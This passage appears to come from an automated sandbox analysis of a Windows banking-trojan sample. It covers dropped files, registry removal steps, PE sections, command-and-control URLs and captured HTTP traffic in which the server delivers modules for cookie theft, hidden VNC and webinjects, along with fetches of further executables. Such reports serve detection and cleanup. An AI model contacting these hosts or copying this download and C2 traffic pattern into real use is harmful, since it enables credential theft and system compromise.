    %System%\WindowsPowerShell\v1.0\SETBB.tmp (3 bytes)
    %System%\WindowsPowerShell\v1.0\SET79.tmp (5 bytes)
    %System%\WindowsPowerShell\v1.0\SET60.tmp (9 bytes)
    %System%\WindowsPowerShell\v1.0\SETCB.tmp (601 bytes)
    %WinDir%\ocgen.log (71000 bytes)
    %System%\WindowsPowerShell\v1.0\SET77.tmp (9 bytes)
    %WinDir%\inf\SET37.tmp (38 bytes)
    %System%\WindowsPowerShell\v1.0\SET9E.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET40.tmp (24 bytes)
    %WinDir%\inf\SET38.tmp (12 bytes)
    %System%\SET2F.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET62.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET98.tmp (7 bytes)
    %System%\WindowsPowerShell\v1.0\SET78.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET5C.tmp (673 bytes)
    %System%\WindowsPowerShell\v1.0\SET9C.tmp (6 bytes)
    %System%\WindowsPowerShell\v1.0\SET6A.tmp (22 bytes)
    %System%\SET30.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SETA8.tmp (1 bytes)
    %System%\WindowsPowerShell\v1.0\SETB8.tmp (5 bytes)
    %WinDir%\tabletoc.log (2313 bytes)
    %System%\WindowsPowerShell\v1.0\SETA3.tmp (13 bytes)
    %System%\WindowsPowerShell\v1.0\SET50.tmp (20 bytes)
    %System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC6.tmp (16 bytes)
    %System%\WindowsPowerShell\v1.0\SETC0.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET42.tmp (601 bytes)
    %System%\WindowsPowerShell\v1.0\SETAB.tmp (12 bytes)
    %System%\GroupPolicy\Adm\SET1F.tmp (38 bytes)
    %System%\WindowsPowerShell\v1.0\SET83.tmp (6 bytes)
    %System%\GroupPolicy\Adm\SET20.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SETBA.tmp (2 bytes)
    %WinDir%\assembly\tmp\3LPSVY14\Microsoft.PowerShell.Commands.Management.resources.dll (1552 bytes)
    %WinDir%\assembly\tmp\VEHKNRUX\Microsoft.BackgroundIntelligentTransfer.Management.dll (1856 bytes)
    %WinDir%\assembly\tmp\FY147AEH\Microsoft.PowerShell.Commands.Utility.dll (20624 bytes)
    %WinDir%\assembly\tmp\XFJMPSVY\Microsoft.WSMan.Management.dll (9608 bytes)
    %WinDir%\assembly\tmp\2MPSVY14\System.Management.Automation.dll (81046 bytes)
    %WinDir%\assembly\tmp\RADGKNQT\Microsoft.PowerShell.Editor.dll (32824 bytes)
    %WinDir%\assembly\tmp\CX148BEH\Microsoft.PowerShell.GPowerShell.dll (22192 bytes)
    %WinDir%\assembly\tmp\3MPSVY15\Microsoft.PowerShell.ConsoleHost.dll (7192 bytes)
    %WinDir%\assembly\tmp\XFILORVY\Microsoft.PowerShell.Commands.Management.dll (9320 bytes)
    %WinDir%\assembly\tmp\L47ADHKN\Microsoft.WSMan.Management.resources.dll (13 bytes)
    %WinDir%\assembly\tmp\HZ258BEH\Microsoft.PowerShell.Commands.Utility.resources.dll (1552 bytes)
    %WinDir%\assembly\tmp\O7ADGKNQ\Microsoft.BackgroundIntelligentTransfer.Management.resources.dll (7 bytes)
    %WinDir%\assembly\tmp\VDGJNQTW\Microsoft.PowerShell.Commands.Diagnostics.dll (3616 bytes)
    %WinDir%\assembly\tmp\K258CFIL\Microsoft.PowerShell.GraphicalHost.dll (9608 bytes)
    %WinDir%\assembly\tmp\YGKNQTWZ\Microsoft.PowerShell.GraphicalHost.resources.dll (784 bytes)
    %WinDir%\assembly\tmp\ATWZ258B\Microsoft.PowerShell.Security.dll (2392 bytes)
    %WinDir%\assembly\tmp\J258CFIL\Microsoft.PowerShell.Editor.resources.dll (2392 bytes)
    %WinDir%\assembly\tmp\7QTWZ258\Microsoft.PowerShell.Security.resources.dll (9 bytes)
    %WinDir%\assembly\tmp\0JMPSVY1\Microsoft.WSMan.Runtime.dll (7 bytes)
    %WinDir%\assembly\tmp\RBEHKNRT\System.Management.Automation.resources.dll (9320 bytes)
    %WinDir%\assembly\tmp\WEHKNRUX\Microsoft.PowerShell.ConsoleHost.resources.dll (1552 bytes)
    %WinDir%\assembly\tmp\TBEILORU\Microsoft.PowerShell.GPowerShell.resources.dll (1552 bytes)
    %WinDir%\assembly\tmp\GY147ADG\Microsoft.PowerShell.Commands.Diagnostics.resources.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\tmp3.tmp (4545 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\tmp4.tmp (7385 bytes)
    %WinDir%\Microsoft.NET\Framework\v4.0.30319\ngen_service.log (68628 bytes)
    %WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD9.tmp\Microsoft.PowerShell.Commands.Utility.dll (40638 bytes)
    %WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD8.tmp\Microsoft.PowerShell.Commands.Management.dll (45020 bytes)
    %WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD7.tmp\Microsoft.PowerShell.Commands.Diagnostics.dll (33116 bytes)
    %WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD6.tmp\Microsoft.BackgroundIntelligentTransfer.Management.dll (27440 bytes)
    %WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPDA.tmp\Microsoft.PowerShell.ConsoleHost.dll (33378 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\fadehi\fadehi.exe (1683 bytes)
    %Documents and Settings%\%current user%\Application Data\Felaytzyymes\zaodxiibaru.ilb (4108 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\WindowsXP-KB968930-x86-ENG.exe (45823 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QL4XETI5\WindowsXP-KB968930-x86-ENG[1].exe (2977755 bytes)

  5. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "c:\documents and settings\"%CurrentUserName%"\local settings\application data\fadehi\fadehi.exe."

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "c:\documents and settings\"%CurrentUserName%"\local settings\application data\fadehi\fadehi.exe "

  6. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  7. Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Static Analysis

VersionInfo

No information is available.

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text40962540482544645.09777a77de89eaf55b3a6eb3c86e9e2fcfdcd
.data2621441275230722.67156585d91141ce4dcbc0176d6d4a54475b4
.reloc278528930697284.20519ecd715ec6d1021452fd0957d69ffac60

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Network Activity

URLs

URL IP
hxxp://www.cpro.moscow/kent/file.php195.242.161.117
hxxp://www.google.com/webhp173.194.113.209
hxxp://www.google.com.ua/webhp?gfe_rd=cr&ei=K7r-VaH8KMSAYPvqs9AP173.194.113.209
hxxp://www.cpro.moscow/kent/exit.php195.242.161.117
hxxp://changeexchange4.ru/new.exe194.28.133.91
hxxp://changeexchange4.ru/bindata865.exe194.28.133.91
hxxp://microsoft.com/134.170.188.221
hxxp://e3673.dspg.akamaiedge.net/download/E/C/E/ECE99583-2003-455D-B681-68DB610B44A4/WindowsXP-KB968930-x86-ENG.exe
hxxp://download.microsoft.com/download/E/C/E/ECE99583-2003-455D-B681-68DB610B44A4/WindowsXP-KB968930-x86-ENG.exe23.64.226.15

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /bindata865.exe HTTP/1.1

Accept: */*

Connection: Close

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: changeexchange4.ru

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Sun, 20 Sep 2015 13:52:44 GMT

Server: Apache/2.2.22 (Debian)

Last-Modified: Sun, 20 Sep 2015 12:45:22 GMT

ETag: "1c795a1-6242c-5202d2355dc80"

Accept-Ranges: bytes

Content-Length: 402476

Connection: close

Content-Type: application/x-msdos-program

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................O.......{.......R.......B...............z.......K.......L.....Rich............PE..L......U..........v..................N............@..........................`.......Y.... .......................................... .......................@......................................h...@............... ............................text...A........................... ..`.rdata...!......."..................@..@.data...............................@....4data..f-..........................@....rsrc........ ......................@..@.reloc.......@......................@..B.........................................................................................................................................................................................................................................................................................................................C.1..:H\\......<.o.8..l..P..H..t6D.o.o..`= ^p|..Q_........6..L.N).....x@=.............<.)T.!P.o....o.o..n........T:..:../U:i|.:......).o.o..).........L:.....=..........T\...........T......S.M.....].....(^.....w.T..]....X\.......x.!T\S..\\\..T........._.`........._.$........._.|........._.x........._.@......\\\\.U.....].........g.D/.........._P.......................g.P)}......S.X............._X........X..o.....T\....................L..P......\\\\...\\\\...\\\\.U.....]......g..!...T_..S.T..LS...S...o.

<<< skipped >>>

GET /download/E/C/E/ECE99583-2003-455D-B681-68DB610B44A4/WindowsXP-KB968930-x86-ENG.exe HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: download.microsoft.com

Cache-Control: no-cache

HTTP/1.1 200 OK

Content-Type: application/octet-stream

Last-Modified: Fri, 09 Oct 2009 23:52:17 GMT

Accept-Ranges: bytes

ETag: "6d3979883b49ca1:0"

Server: Microsoft-IIS/8.5

Content-Disposition: attachment

Content-Length: 6156064

Date: Sun, 20 Sep 2015 13:52:51 GMT

Connection: close

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#pA.B...B...B..gM...B...B...B..gMC..B..gMA..B..gM@..B..gMD..B..Rich.B..........................PE..L....jkG.............................c... ........... ................................^.......... ......................................x.............]. ........... "...............................&..@............ ...............................text........ ...................... ..`.data...............................@....rsrc...x........H].................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................l...V...:..."...............................|...................................(...r...d...T.......*...........P...j...................<...................\.......................................>...L...^...n...........................................2...L.......h...p.......................................(...>...L...`...v...................................N...>...,...................d...........................................................z...,...<...J...\...|.......N...Z...d...n...@....

<<< skipped >>>

GET /webhp?gfe_rd=cr&ei=K7r-VaH8KMSAYPvqs9AP HTTP/1.1

Accept: */*

Connection: Close

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Cache-Control: no-cache

Host: VVV.google.com.ua

HTTP/1.1 302 Found

Location: hXXps://VVV.google.com.ua/webhp?gfe_rd=cr&ei=K7r-VaH8KMSAYPvqs9AP&gws_rd=ssl

Cache-Control: private

Content-Type: text/html; charset=UTF-8

P3P: CP="This is not a P3P policy! See hXXp://VVV.google.com/support/accounts/bin/answer.py?hl=en&answer=151657 for more info."

Date: Sun, 20 Sep 2015 13:52:43 GMT

Server: gws

Content-Length: 281

X-XSS-Protection: 1; mode=block

X-Frame-Options: SAMEORIGIN

Set-Cookie: PREF=ID=1111111111111111:FF=0:TM=1442757163:LM=1442757163:V=1:S=wshWM2whNkU12bKk; expires=Thu, 31-Dec-2015 16:02:17 GMT; path=/; domain=.google.com.ua

Set-Cookie: NID=71=XMvwuHf2AYJf-H3X3-9LfytjOF82Yzw25AX3pFcNMCLiNicEeMbCMUhD08OlXnPMnRnB1gMsrYgzsDMrDnawfCkk256_UD-JSIIkHgUhE5AvWpL0AXPpZ_O_3349_pir; expires=Mon, 21-Mar-2016 13:52:43 GMT; path=/; domain=.google.com.ua; HttpOnly

Connection: close

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">.<TITLE>302 Moved</TITLE></HEAD><BODY>.<H1>302 Moved</H1>.The document has moved.<A HREF="hXXps://VVV.google.com.ua/webhp?gfe_rd=cr&ei=K7r-VaH8KMSAYPvqs9AP&gws_rd=ssl">here</A>...</BODY></HTML>....

POST /kent/file.php HTTP/1.1

Accept: */*

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.cpro.moscow

Content-Length: 132

Connection: Keep-Alive

Cache-Control: no-cache

....$..0..<l..t-..st....sQs.p..YN..(m=..l.%..T.)..f....r.Xe3.9*<...=.X..z..."Yc1...V,...2g.t\H0Z..9.. .x.eV.%.1.|TO....q..........

HTTP/1.1 200 OK

Server: nginx/1.2.1

Date: Sun, 20 Sep 2015 13:52:14 GMT

Content-Type: application/octet-stream

Content-Length: 14144

Connection: keep-alive

X-Powered-By: PHP/5.4.27-1~dotdeb.1

Cache-Control: public

Content-Disposition: attachment; filename="./files/kent.xml"

Content-Transfer-Encoding: binary

1....Z.ec...4.....|}..W.X.~."........*..?n.#M..EW.S.n..Xf..p5[.%.O..x5...q...]...q.!\.l.z...E..i...}...P...e..u..h.dg,b..=..A..I...U.RC.S..B....9.B;...]b......-..4z^.l.............0.=...........YY..... Y4z$......t...o...C}*.j....9...6.N.......?...M.?'X..b.........K..!..$2x...K..^..._......s.w...U.=.K..\..Su1..=.bB^.N.J.....l...?...S......F.E..%..E... S_x.]...g.,T.B..V5;..)=.b.0@!....v3sBL)....d....%F]..2.H}.......U^.Bt...)..m...p0.M..%..K.9.N....N.u..<.. {.rl .....O....iq...Y.#;^6....`.~,z.Y..HZ...3...Y...~('.9...d.u"...........TJ.*.<.N.xQ/TH(.......>p,..M/_..O....f.........K.C..'....q.[2aHm/s.J.DS....7z......._.....,.(..!JG.#..cB.....0.....=.g....t...%a..."6..!bxj/.<.!..........E..$]......_J..3Vu.tm...........J-.w..u.h..3...T....rlU..f.a@r^0....6!..Q_ .o...G..e._qXE........{...F.....d..qv....X.[@}..|..-.:JKO..h........;...$.....................R.f....O..n.....Oz.@?..7.Ee.#~G.......5;...f.9.z:..w...#I....;.a.........Vs..s.i^. r..#.&...!.A....K%......z.F....>]....a/4.../..L.VC?...4l ..!..... .UI....a.."f....g..k.=qj.n\....t.?p=..=}m..k.P.........P...R..tJE.gk..O.......Am..T..1.o....E..)w..9fu.?...zGn........w.U~S.>3I.......i4.H.D..-KD~f.,H.K....n...9..w...4.g-.....L)s.ueYU....b..f.\. ..b..IK.Sxi:.."..j.X..W.^&*.....s..Rb-.j.v7.vM.....N.eM]..;.va..K.].{Z.M....T..RO......L.*-.....k~;.P...Z.1k=.fx..P%.kf..w#...=.. ....D..o....$..?x>yy.:..:@..2.#Jq.I(.T8.%..Y...@.....@...........5b..B.;}.3/..i...X.'....G].ET..2k....u..3.M.d)...n9..Z.....(O..d98.2...u...].z.mw.....\F..:. ....L.q.....-......k?.B..

<<< skipped >>>

POST /kent/file.php HTTP/1.1

Accept: */*

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.cpro.moscow

Content-Length: 145

Connection: Keep-Alive

Cache-Control: no-cache

1......wf....a.se.......De.7...0......e...w..Q.F.....H..N..)....o.......g... .R...)..R......:....#Gb|. .....lQK.d./.TQ.\rzx...,K.(.....@..1...p>

HTTP/1.1 200 OK

Server: nginx/1.2.1

Date: Sun, 20 Sep 2015 13:52:14 GMT

Content-Type: application/octet-stream

Content-Length: 221468

Connection: keep-alive

X-Powered-By: PHP/5.4.27-1~dotdeb.1

Cache-Control: public

Content-Disposition: attachment; filename="./files/atmos_ffcookie.module"

Content-Transfer-Encoding: binary

.....Qp.d8... ^c.PK..Q^/-...vii..'E.......a.K..........a[.......F5...}.%.......j..b...Rq......k.....DC.Y.l.|..6_...1....U..}...WjB|..3%.....hh....}R.r;1..CV%Q.gM....._.......}xo...(.......$.=Y....z....X...2....O..>.Ijg.....o...Mx80.&.C.Ti....CL....0..x....I7wN5...ei.$.... *..)......m.Y...."....PRPk..........8............s.)...a...Ul.B............l......X.~..L..A...x`)..z(....2)..Rqvx.S..{K."........k..L.....9...[..Y...&..D..m.J..fNN..Y..c..u.a...W43XphI.'<v....*.f.E.OYZ..F:.X....n..B....-..Bu..pw.{#........[5....u..5..X7. .0....|...g.q...I.!...j...........U....E.^bXr....I.~G"7].(...M.)".BHC.,6!..2.b...K..&.b.#q.s...\8]...'..lC..w....E.....4.c....c}.@$.w..B...9...o...J....DP.`j.t..n......)...T\.a.@..^.=...C..X.U....{......(.[...$S....PL.h...6.(....{.t..Y...1.r......T.....k.....1..l..C.C..b"Q.Z...A.K`.]:C.....N....o)....7.y...E..8..W...x...j........d..Y.../.sid.g..H.Y.`.....hC.W.......v...v..j...&......S.c...X...ky...nE\.QZ....&.8x.nT.*...u.....<.....U.!.........4...us..?......1........W..*YC.......RS3.p..q^.....$.S.=....c..U..E......-....O..v.w.Y.......*.....G...Tq...6......Z....B.[........ ,..a..A..a.....R.B....m'.h..[...o.R..GDf.L.N@...J..Y....\^.o.". .e...x.......E.........<i6Y>........k.t...R&..#}.].g........1....:...(.;.........."......EQ5.........R". ..~.4F......r...x..".`y(...l..a{'.E..._#._...u=.|."d m>..0&........%..x.tv....x./g.Ty.=..).*Bu7t0..-....<..l.O.m?.].'....5.8....;....%.4y.M..p.Q^&.....n..@..|V.(._e...M..0...sl.|y......&.3b]Z.O..a.........G.. F.2.......;%R..L7.{.(s...<_

<<< skipped >>>

POST /kent/exit.php HTTP/1.1

Accept: */*

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.cpro.moscow

Content-Length: 404

Connection: Keep-Alive

Cache-Control: no-cache

I>.d....G.J.]...<.!.X..B..Cp1?....(.R..*....d..=....9h....E...-c3......8....4...|O.....p.:.Sp5..m..&..y..E3..q.$...\.B.`7.|w......n........T...t.U...L..Cb.Qq

_.).....h.%s.b..0.,?jEQ......|Va......<.du.C...3...N...0]A..S....Q{~..vw.@...K.yY`nI....8.".{:0.l..5A.]...8..#. p."lDn.....qg:.q*...W.`C@..P?.R..$.V$....g......c.M.C..._..c<.... ...&.]..r.2..Z....T.]A.n....k*...?. .....u7..8.'..<...=vvb.%1

HTTP/1.1 200 OK

Server: nginx/1.2.1

Date: Sun, 20 Sep 2015 13:52:44 GMT

Content-Type: text/html

Content-Length: 305

Connection: keep-alive

X-Powered-By: PHP/5.4.27-1~dotdeb.1

Vary: Accept-Encoding

.2._.7......b...3.{.J.k...........s.{(A3.a^...N._..[f...I....l.<%.5...q...C..2............no`...............K..3...3......_..M..H.,1gI.v....o..bOP........o....[......zy.s....] ..G2.....-.........;C..oc....hh.M....~O 2...`......&...SpH.....*..4. ....[....Ez.......-i.(....}.u{....<./17.JS.:H.h!v......s....HTTP/1.1 200 OK..Server: nginx/1.2.1..Date: Sun, 20 Sep 2015 13:52:44 GMT..Content-Type: text/html..Content-Length: 305..Connection: keep-alive..X-Powered-By: PHP/5.4.27-1~dotdeb.1..Vary: Accept-Encoding...2._.7......b...3.{.J.k...........s.{(A3.a^...N._..[f...I....l.<%.5...q...C..2............no`...............K..3...3......_..M..H.,1gI.v....o..bOP........o....[......zy.s....] ..G2.....-.........;C..oc....hh.M....~O 2...`......&...SpH.....*..4. ....[....Ez.......-i.(....}.u{....<./17.JS.:H.h!v......s........

POST /kent/exit.php HTTP/1.1

Accept: */*

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.cpro.moscow

Content-Length: 277

Connection: Keep-Alive

Cache-Control: no-cache

.PLr...`..\...E_%.hO..pC{ny.....

89. C7%d/..;.".7.......e.1...._.i`..O.f.. DR..5B.....2]...,9.8...q....W._....zq

w..7.C...sN\D....7.3..Ajoq.h.S/.2....a1........TF..m./s.n.e_

G.M..M.?!.../.j..i".>.bR..8%C..l=.j8.Hw.M...5Gkbo.&....Fp...@...u.E..;k....7l...6..0...'-..;.....

HTTP/1.1 200 OK

Server: nginx/1.2.1

Date: Sun, 20 Sep 2015 13:52:44 GMT

Content-Type: text/html

Content-Length: 76

Connection: keep-alive

X-Powered-By: PHP/5.4.27-1~dotdeb.1

Vary: Accept-Encoding

....]..Q.....X.V..MBc.i.%...).... ._73,..&.|..G5.1].h>5.)...K.5......A.6.E.....

POST /kent/file.php HTTP/1.1

Accept: */*

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.cpro.moscow

Content-Length: 147

Connection: Keep-Alive

Cache-Control: no-cache

._..1.G.S.....Zw%A.X~"...<.J;....=.. >(..;>{_f.2...Jb:..h.?...bV.)vT(..W|..D..E._.R.....#..C.h........q....w..X{..PX'.,&....[r.zk.qi.......aE...|.

HTTP/1.1 200 OK

Server: nginx/1.2.1

Date: Sun, 20 Sep 2015 13:52:45 GMT

Content-Type: application/octet-stream

Content-Length: 9887

Connection: keep-alive

X-Powered-By: PHP/5.4.27-1~dotdeb.1

Cache-Control: public

Content-Disposition: attachment; filename="./files/webinjects/merged-1.txt"

Content-Transfer-Encoding: binary

.[}.h3....H*{.1..;.E...b...K!Hi....4t"..Jx.l4...k..}.@.v ...w.kM.ts.R....|i..uH.r!c........Pk...6.w.P:...zWpt....Y.-...)...i....y"..vyn.J.z.......vR...........yB.....d\....nh..[.e.}.?Y.g\8Fd[J.#..s.~....H.~H...~g..er.,....&1...Ggg..!..1fw .y?j.|.E2i_.^.l...Gn.........wD._B;..h01Y..v..U:..2.4..U.....?.>.Pn...Vy.g..."g.l.60.h8i.`.......5..B.XwS.U.....X<:...<.(.l..&d:.to.........b.....U...<....d.xf....K.sq[F....1\]..=Z&..|..~......E........MPt.#D....,3.*..:5...d.]..Z.........YjR.....*\.M.,..#/j.....f=....L7...,C..z..{...s1.X...Q~'.:>..ln..&.....a...).j..G...............RLk.&..bs.mN...6{.e..r..I~`,..G...*W.. ..7.k.v....Wr..P....(^.K........-..Lw.....{br...U!5. L'....?.....p..../.}3...\;..&h6'2..<..E..ZN...o.|.,.....6eb......|1...!.$....<.,.q.C....-..q..X..T.6....G(.."...Hc..d.........r.;U..7q..,.6c...e$p.[.J..l....x..7.D..% ..(..]..rJ-g..V}_.B..m...5q.. ..Q....NX%..v..n._A...G....(). ~.}:}...*..#..&U........gQbh).d.R".u.G.z)\.."..!H.\.......8. |.....#.yR.|..Qp....v.k\.BeE...U3..=.g..lR.DL.....3o..i.\?6[..0..f..E.0.i.Bw.u..El..Q@c......D..=..#..1...).XN.2._>>5.....B..?/.,.aF.....'.S...N{....;..Z...1.....%.v.?{...@J.z|..O.i.(.....Lk.-t.7...A........>r...v....19.-VT./....U|M..Niu.`...?r\.o..j;`..[.n.k@..|..i.~...j$....5#(..7..._.U..nl......OH....'.`V.DN5<QyE=....'5e....x......|4..P...G...N.GI...e....,...K^/........u,k..sD=.....L.NR.>.....]Q...&.]0....k.W.:.k'.Q.i....6,-Qp~!{qkr.:..."....-.........tD...zD!.c....vHM.?.*..^..J....X.5.<.u........c7...7jo.dm.(BB..0......I...h.....q&q

<<< skipped >>>

GET /webhp HTTP/1.1

Accept: */*

Connection: Close

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.google.com

Cache-Control: no-cache

HTTP/1.1 302 Found

Cache-Control: private

Content-Type: text/html; charset=UTF-8

Location: hXXp://VVV.google.com.ua/webhp?gfe_rd=cr&ei=K7r-VaH8KMSAYPvqs9AP

Content-Length: 265

Date: Sun, 20 Sep 2015 13:52:43 GMT

Server: GFE/2.0

Connection: close

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">.<TITLE>302 Moved</TITLE></HEAD><BODY>.<H1>302 Moved</H1>.The document has moved.<A HREF="hXXp://VVV.google.com.ua/webhp?gfe_rd=cr&ei=K7r-VaH8KMSAYPvqs9AP">here</A>...</BODY></HTML>....

POST /kent/file.php HTTP/1.1

Accept: */*

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.cpro.moscow

Content-Length: 142

Connection: Keep-Alive

Cache-Control: no-cache

.....HQ..K4.fR......2.44S..kq..@I3.;..u.k.>...c...*.....s..Y#Z.....i&|GC)T>*E.&..ic..'b..d.&...Av...&....g ..MO.zm.[.K..}

..2a.? 4c.T..^.TO

HTTP/1.1 200 OK

Server: nginx/1.2.1

Date: Sun, 20 Sep 2015 13:52:14 GMT

Content-Type: application/octet-stream

Content-Length: 174876

Connection: keep-alive

X-Powered-By: PHP/5.4.27-1~dotdeb.1

Cache-Control: public

Content-Disposition: attachment; filename="./files/atmos_video.module"

Content-Transfer-Encoding: binary

.....Qp.d8........'(.e..........4".,.NA...7.H.j...C....4.zR..T8..X...V.*.....<...0.$.S0...uq.z.kv..>.7.YF(..U.3su.DE,\A....{Q{}.[.]..Q.C..aW..,r%'N..*....M.Y.....^4..*~...NO..,"d./..s<GRR.Pb..1F....\t.CX..f.~mjL.:%,....[....wTS2b....lx...@.....C..;2........]........<.Z..3....\.5e..N...p....!;.d/...gy....=..Q.%3./.b... .<.d.R.{'.".#.LC-...]....&w.R.unO.).M=.i$.w....&....j%2?.. .c|;6h.eK.k.....G...J...*. .U.2.r&6-j....TN...2...XI...M.......uC.T.Y... ......$...E..@.G.3J..S...b)>".%u..-.....e...o.d.mV..(......D..F.p&..{.i.G&..Z....?EV.V:.SB.W.g...|u.....Y.U..G.>j..g....ClX..........u.....W.......z.f....]K.4.6#.B...Q&.PQ5......:..... ......Z.6..}.e.o...~.R.._i:...4.. =[}.@o...W...!..[.$@....,Y...v...UP...... ...[IZ.(B...3. ..VotAq#....."P...U.-.#...K.^,x4R-.`q.<,bE....?..g..g.;...KHs.?..... j`.I.q.=V.|...MI...........^.4V.N.f......IOt..4`.."*T8@.d.`. ...iS......G..,....1.X.i.......p.c....0.,..z.....j.......t..Q.T.8...A........).).#...i..$9...."OV.Qn.......^.M..V...~B....:...9C.l5 ..Y.|........l.t.&...:u..z..I....'...)...l...l;.3 ....`.R.tf."(y@...Rg..B.../...C.d.y%...>..\...J.ca.....{......1_..8P$....ob....w.4....`gi..*)E...I...E...n.`.6.....^-.....d.:I.\..\3....#kx1... 2..T...(KY=v.......y...P2.JFs..H...u1..F.U..o.3.&.#.D.t$...AP. ....F.PC...#......T./...e.7. ......a.p.g.C\=.i7}5..5...,.Ew..b..$.D....m.-[....G.3.U........ e!Y?....2*..wc.af....xmH...O.T`......k...7..2.%bI..K.....E~..F=....3.....M.xY........<....($..Q..C..RH.G(t.e...t/Wf,. ..G.o.I.*..HB.F.(..t.[.t.1=..O..../..Lj^.[.,].].

<<< skipped >>>

POST /kent/file.php HTTP/1.1

Accept: */*

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.cpro.moscow

Content-Length: 141

Connection: Keep-Alive

Cache-Control: no-cache

fOg..3<.Z...=.Wv....b.:.$..4..0Y.....k.. .[...|..j...l..=-.;N......*.x...?3D...J3?......V...b..I......#fF.&*v..............V./....8.`./..%

HTTP/1.1 200 OK

Server: nginx/1.2.1

Date: Sun, 20 Sep 2015 13:52:14 GMT

Content-Type: application/octet-stream

Content-Length: 225052

Connection: keep-alive

X-Powered-By: PHP/5.4.27-1~dotdeb.1

Cache-Control: public

Content-Disposition: attachment; filename="./files/atmos_hvnc.module"

Content-Transfer-Encoding: binary

.....Qp.d8........f.U....y...c.l.C.e..|k..1.@.._.CF._:.l.;0U^."}..J..f...3K._I.........f. h....^0..(..7..k.J<.Q .R..\`.t. .c.../.a6..%.D..}b.V{<%.7qX,......A.......!.F>_.O..P...#.DS7.............Z,......!...\.cS......[|......p.K.Y...P.V..x.Y..^"P.I?.7oj>...h.x.........Q ./.......;,NF%Wf.YOQ.*z.l"...........w.....>.d...........rY,.c.(H..^h... .....}.%Z.....H<...g.:t{2l.Y.r6.....x.....q,kW...thS.....1....S .5.Cb.b.O.?....s....*d\..#...2u..cDFY$......Bp....*......p#.u....6....WU.;F..l.......c>z....D.H.WJ-.2U........>.......D...........x9..R......'.5..,..;..... .M........"O.........B....-^#;.A.._*lb.6IP.'.k.o.......9<.>g......P..T.p.t..,%.......a..#.~.r84.._.....U..LI.....!.....5..D.....`...A..g.4.0~6.....!...M.I.O....4..]65v......]...@.m...5........... ...R..7>.....4.C..a.qw)B......./.P.....x....x)w.x..e........r....4j......`Ms...E.....#..x0..$.ix...N..70Ug...G0.{-.ZF.R.-....?.......8p.......j.|q.9.{.~..@.9c]...X.Y/.^.....&$Az\....e....i.P.%....../.B./.QE.2V0..A.h!....,...L-. 